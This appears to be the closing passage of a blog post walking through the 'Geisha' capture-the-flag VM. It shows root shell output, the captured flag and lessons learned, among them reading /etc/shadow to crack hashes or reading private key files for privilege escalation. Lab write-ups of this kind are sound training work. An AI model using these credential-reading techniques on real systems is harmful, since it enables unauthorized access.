-rw-r--r--  1 root root   27 May  9  2020 flag.txt
drwxr-xr-x  3 root root 4.0K May  9  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 May  9  2020 .selected_editor
drwxr-xr-x  2 root root 4.0K May  9  2020 .ssh
root@geisha:~# cat flag.txt
Flag{Sun_CTF_220_5_G31sha}
root@geisha:~# 

Privilege escalation succeeded and the root flag was obtained.

Lessons learned

  1. Because this VM exposes many ports and the pages they return look almost identical, it is easy to get impatient. That impatience led to typing https instead of http when enumerating directories with gobuster, so the run failed, and the error was then ignored even though port 7125 turned out to be the key step for this VM.

  2. Once a shell is obtained and there is a command or tool that can read files (read access only, no write access), there are two privilege-escalation approaches:

    1) read /etc/shadow and crack the hashes

    2) check whether a private key file can be read

posted @ 2023-02-23 14:56  Jason_huawen